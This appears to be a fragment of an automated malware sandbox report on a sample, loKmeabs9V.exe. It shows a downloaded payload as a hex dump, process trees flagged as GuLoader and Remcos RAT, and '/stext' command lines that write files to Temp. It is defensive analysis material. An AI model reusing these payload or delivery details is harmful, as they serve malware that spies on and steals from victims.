                              Aug 2, 2021 15:03:10.090718031 CEST5269INHTTP/1.1 200 OK
                              Date: Mon, 02 Aug 2021 05:03:09 GMT
                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                              Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT
                              ETag: "72840-5c886c5bd2c84"
                              Accept-Ranges: bytes
                              Content-Length: 469056
                              Content-Type: application/octet-stream
                              Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38
                              Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:L*HC[kn,OY|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1L*tCvkytbz3a$q10`]kcp]*z$_U]Xl8yeq~&r)B<XJ),RxBa|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'G*HR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K|X&U/0)|$"YngZp$TO|85UY#g"s@OafKhK'<|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8


                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: loKmeabs9V.exe PID: 1536 Parent PID: 5592

                              General

                              Start time:15:01:09
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\loKmeabs9V.exe'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              Analysis Process: loKmeabs9V.exe PID: 476 Parent PID: 1536

                              General

                              Start time:15:02:09
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\loKmeabs9V.exe'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, Author: Joe Security
                              Reputation:low

                              Analysis Process: loKmeabs9V.exe PID: 3576 Parent PID: 476

                              General

                              Start time:15:03:11
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Analysis Process: loKmeabs9V.exe PID: 484 Parent PID: 476

                              General

                              Start time:15:03:12
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Analysis Process: loKmeabs9V.exe PID: 4112 Parent PID: 476

                              General

                              Start time:15:03:13
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Disassembly

                              Code Analysis

                              Reset < >